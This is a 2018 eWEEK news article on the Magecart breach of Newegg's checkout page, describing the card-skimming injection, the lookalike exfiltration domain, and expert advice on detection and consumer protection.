Close
  • Latest News
  • Cybersecurity
  • Big Data and Analytics
  • Cloud
  • Mobile
  • Networking
  • Storage
  • Applications
  • IT Management
  • Small Business
  • Development
  • Database
  • Servers
  • Android
  • Apple
  • Innovation
  • Blogs
  • PC Hardware
  • Reviews
  • Search Engines
  • Virtualization
Read Down
Sign in
Close
Welcome!Log into your account
Forgot your password?
Read Down
Password recovery
Recover your password
Close
Search
Menu
eWEEK.com
Search
eWEEK.com
  • Latest News
  • Cybersecurity
  • Big Data and Analytics
  • Cloud
  • Mobile
  • Networking
  • Storage
  • Applications
  • IT Management
  • Small Business
  • Development
  • Database
  • Servers
  • Android
  • Apple
  • Innovation
  • Blogs
  • PC Hardware
  • Reviews
  • Search Engines
  • Virtualization
More
    Home Cybersecurity
    • Cybersecurity

    Newegg Is Latest Retailer to Be a Victim of Magecart Malware

    By
    SEAN MICHAEL KERNER
    -
    September 20, 2018
    Share
    Facebook
    Twitter
    Linkedin
      Backoff malware

      Online retailers have increasingly come under attack in 2018 from a hacking group known as Magecart. The latest victim is allegedly online computer parts retailer Newegg, which admitted on Sept. 19 that it was breached.

      Volexity Threat Research working in collaboration with RiskIQ identified the attack on Newegg. According to the two research groups, Newegg may have been breached for over a month, with attacks beginning on approximately Aug. 14. The research groups noted that the malicious code was removed from the Newegg site on Sept. 18.

      “Yesterday we learned one of our servers had been injected with malware which was identified and removed from our site,” Newegg wrote in a Twitter message. “We’re conducting extensive research to determine exactly what info was obtained and are sending emails to customers potentially impacted.”

      Magecart has been implicated in multiple high-profile attacks in recent months, including ones on British Airways on Sept. 7 and Ticketmaster on June 27. 

      Volexity reported that the Magecart attackers were able to inject a few lines of malicious JavaScript code onto a webpage that is shown to consumers during the Newegg checkout process. “The malicious code specifically appeared once when moving to the Billing Information page while checking out,” Volexity researchers wrote in a blog post. This page, located at the URL https://secure.newegg.com/GlobalShopping/CheckoutStep2.aspx, would collect form data, siphoning it back to the attackers over SSL/TLS via the domain neweggstats.com.”

      Attackers registered the neweggstats.com domain on Aug. 13, with an SSL/TLS certificate created for the site at the same time. According to Yonathan Klijnsma, threat researcher at RiskIQ, the Magecart attackers registered the domain in an attempt to blend in with Newegg’s primary domain.

      “Similar to the British Airways attack, these actors acquired a certificate issued for the domain by Comodo to lend an air of legitimacy to their page,” Klijnsma wrote in a blog post.

      Newegg has not publicly stated how many customers have been impacted by the data breach. The company has sent out a letter to customers, noting that it plans on publishing a complete set of details in an FAQ page by Sept. 21. In Klijnsma’s view, given that Newegg’s site gets approximately 50 million visitors a month and that the Magecart skimmer was active for a month, there could be a “massive” number of victims.

      Industry Reaction

      According to Craig Young, computer security researcher for Tripwire’s VERT (Vulnerability and Exposure Research Team), the Newegg breach is an example of how Certificate Transparency (CT) logs can be a useful source for threat intelligence. With CT logs, SSL/TLS certificates are logged and presented to the public, enabling organizations to identify any misissuance. There are multiple freely available tools for checking CT logs, including the Certificate Transparency Monitoring tool from social media giant Facebook.

      “In this case, the attack campaign started with the attackers setting up an HTTPS server at neweggstats.com,” Young wrote in an email to eWEEK. “For Newegg, seeing this domain come online wouldn’t immediately indicate a breach, but it should be enough for a security team to investigate further and likely reveal the newly added references to this domain in their checkout code.”

      There are several things that consumers can do to help protect themselves from being a victim of a Magecart-related attack. Leigh-Anne Galloway, cyber-security resilience lead at Positive Technologies, commented in an email to eWEEK that consumers can use the NoScript browser extension to block potentially malicious JavaScript from running. She also recommends that banks make use of 3-D Secure technology, which is a protocol-based approach that requires additional confirmation when paying.

      “It’s also a good practice to connect SMS notification service so that if you see the notification of a suspicious operation, you can immediately block the card in order to avoid further fraudulent operations,” she said.

      Sean Michael Kerner is a senior editor at eWEEK and InternetNews.com. Follow him on Twitter @TechJournalist.

      MOST POPULAR ARTICLES

      Android

      Samsung Galaxy XCover Pro: Durability for Tough...

      CHRIS PREIMESBERGER - December 5, 2020 0
      Have you ever dropped your phone, winced and felt the pain as it hit the sidewalk? Either the screen splintered like a windshield being...
      Read more
      Cloud

      Why Data Security Will Face Even Harsher...

      CHRIS PREIMESBERGER - December 1, 2020 0
      Who would know more about details of the hacking process than an actual former career hacker? And who wants to understand all they can...
      Read more
      Cybersecurity

      How Veritas Is Shining a Light Into...

      EWEEK EDITORS - September 25, 2020 0
      Protecting data has always been one of the most important tasks in all of IT, yet as more companies become data companies at the...
      Read more
      Big Data and Analytics

      How NVIDIA A100 Station Brings Data Center...

      ZEUS KERRAVALA - November 18, 2020 0
      There’s little debate that graphics processor unit manufacturer NVIDIA is the de facto standard when it comes to providing silicon to power machine learning...
      Read more
      Apple

      Why iPhone 12 Pro Makes Sense for...

      WAYNE RASH - November 26, 2020 0
      If you’ve been watching the Apple commercials for the past three weeks, you already know what the company thinks will happen if you buy...
      Read more
      eWeek


      Contact Us | About | Sitemap

      Facebook
      Linkedin
      RSS
      Twitter
      Youtube

      Property of TechnologyAdvice.
      Terms of Service | Privacy Notice | Advertise | California - Do Not Sell My Info

      © 2020 TechnologyAdvice. All Rights Reserved

      Advertiser Disclosure: Some of the products that appear on this site are from companies from which TechnologyAdvice receives compensation. This compensation may impact how and where products appear on this site including, for example, the order in which they appear. TechnologyAdvice does not include all companies or all types of products available in the marketplace.

      ×